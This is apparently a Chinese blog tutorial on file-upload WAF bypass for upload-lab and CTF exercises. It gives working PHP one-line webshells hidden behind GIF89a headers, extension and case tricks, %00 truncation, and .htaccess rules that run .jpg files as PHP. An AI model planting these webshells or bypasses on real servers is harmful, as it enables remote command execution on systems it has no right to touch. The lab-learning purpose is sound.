当前位置: 首页 > news >正文

【文件上传WAF绕过】<?绕过、.htaccess木马、.php绕过

news 2025/8/15 18:10:01 
🍬 博主介绍👨‍🎓 博主介绍:大家好,我是 hacker-routing ,很高兴认识大家~
✨主攻领域:【渗透领域】【应急响应】 【python】 【VulnHub靶场复现】【面试分析】
🎉点赞➕评论➕收藏 == 养成习惯(一键三连)😋
🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步📝文末有彩蛋
🙏作者水平有限,欢迎各位大佬指点,相互学习进步!

目录

文件上传常用waf绕过木马

路径

00截断

1、upload11(GET传参)

2、upload12(POST传参)

.htaccess绕过(apache浏览器使用)

第一种:

第二种:

题目

一、

二、

文件上传常用waf绕过木马

GIF89a
<script language="php">
@eval($_POST['cmd']);phpinfo();
</script>

//校验文件内容
1:校验你内里里面有没有图片头
GIF89a2:校验你的内容 有没有木马格式
<?php eval($_POST['cmd']);?>//以下两种情况上变形校验:
一.校验:内容里面有没有<?
GIF89a
<script language="php">
@eval($_POST['cmd']);phpinfo();
</script>二.校验:内容里面有没有:php
GIF89a
php<?=@eval($_POST['cmd']);三.如果过滤了php后缀
利用phtml
php空格
php.四.文件名大小写绕过
Php、pHp名单列表绕过
php5、php7、php9
.php.rar

路径

../上级目录
./当前目录相对路径
../upload/小马.phtml11.11.10.1:8080/upload/xml/index.php
==>跳转到11.11.10.1:8080/html/hhh/小马.php因为index.php前面有两级/upload/xml/
所以利用:../../**html/hhh/小马.php

00截断

//00截断适用于很多场景,
只要目标没有执行重命名操作,
都可以尝试00截断。小马.jpg改为==>小马.php%00.jpg上传前要把%00给url解码

上传成功:

1、upload11(GET传参)

我们这里老方法,改后缀php,但是发现是白名单,所以这里利用%00截断

利用%00截断

浏览器访问,成功上传

2、upload12(POST传参)

这里是POST传参,

上传成功

浏览器访问,上传成功

.htaccess绕过(apache浏览器使用)

一定要是.jpg文件

第一种:
//指定xiaoma.jpg这个文件
<FilesMatch "xiaoma.jpg">SetHandler application/x-httpd-php  
</FilesMatch>//绕过步骤:
1.先上传.htaccess文件上去
<FilesMatch "xiaoma.jpg">  SetHandler application/x-httpd-php  
</FilesMatch>2.再上传xiaoma.jpg木马文件,
GIF89a
<?php
@eval($_POST['cmd']);
?>3.再点击那个文件名为xiaoma.jpg的发送
就可以利用**upload/xiaoma.jpg**访问上传文件
(http://127.0.0.1/uploadlab/upload/xiaoma.jpg)

重发两个包:发送给重发器

访问这个xiaoma.jpg,上传成功

第二种:
.htaccess内容:
AddType application/x-httpd-php .jpg
//将.jpg文件按照php代码来执行1.首先上传.htaccess文件上去2.然后再上传一个.jpg文件上去
GIF89a
<?php
@eval($_POST['cmd']);
?>然后再用POST的cmd命令执行命令
cmd=system("ls /");

题目

一、

http://teamxlc.sinaapp.com/web5/21232f297a57a5a743894a0e4a801fc3/index.htmlicon-default.png?t=N7T8http://teamxlc.sinaapp.com/web5/21232f297a57a5a743894a0e4a801fc3/index.html

利用%00截断

二、

是兄弟就来传🐎icon-default.png?t=N7T8http://8d9be4fd-86bc-4a71-974b-f758a76a6e5d.node5.buuoj.cn:81/

上传xiaoma.jpg。并抓包,重发两次

.htaccess木马:<FilesMatch "xiaoma.jpg">  SetHandler application/x-httpd-php  
</FilesMatch>

后面就可以成功getshell了

http://www.lryc.cn/news/293094.html

相关文章:

  • flutter如何实现省市区选择器
  • Python——将Pyaudio的frame音频数据转换成wave格式
  • Vue 上门取件时间组件
  • 学习python第一天
  • interface转string输出打印
  • 如何在PS5上使用金手指修改游戏
  • M1芯片MAC 安装MySQL、Nacos遇到的问题
  • 尝试创建若依系统项目(vue3+element-plus+vite) 持续更新...
  • Pytest测试用例参数化
  • 【Vue】指令之显示切换,属性绑定
  • Z字型遍历二叉树
  • 【Go语言成长之路】安装Go
  • C语言常见面试题:C语言中如何进行图形界面编程?
  • 删除元素(数组)
  • WPF DataTemplate内重写BorderBrush,VisualBrush内数据源绑定提示绑定失败
  • ElasticSearch搜索与分析引擎-Linux离线环境安装教程
  • 网络安全全栈培训笔记(59-服务攻防-中间件安全CVE复现lSApacheTomcataNginx)
  • 操作系统真象还原---系列笔记总结
  • 猫用空气净化器好吗?好用的养猫宠物空气净化器品牌推荐
  • 【计网·湖科大·思科】实验六 IP数据报的发送和转发流程、默认路由和特定主机路由
  • freertos 源码分析一 list链表数据结构
  • 小程序uni-swiper-action-item滑动不了
  • 【新课】安装部署系列Ⅲ—Oracle 19c Data Guard部署之两节点RAC部署实战
  • 【从零开始的rust web开发之路 四】rust语言tokio异步使用redis教程
  • uniapp本地存储的几种方式localStorage
  • 扩展学习|统计学习理论(SLT)与极限学习机(ELM)应用于大社会数据分析
  • 配置实例—交换机VLAN聚合配置实例
  • 网络开发的隐形壁垒:如何巧妙解决跨域难题?
  • 【极简】conda同一个服务器上迁移环境 export / create
  • HBase 数据导入导出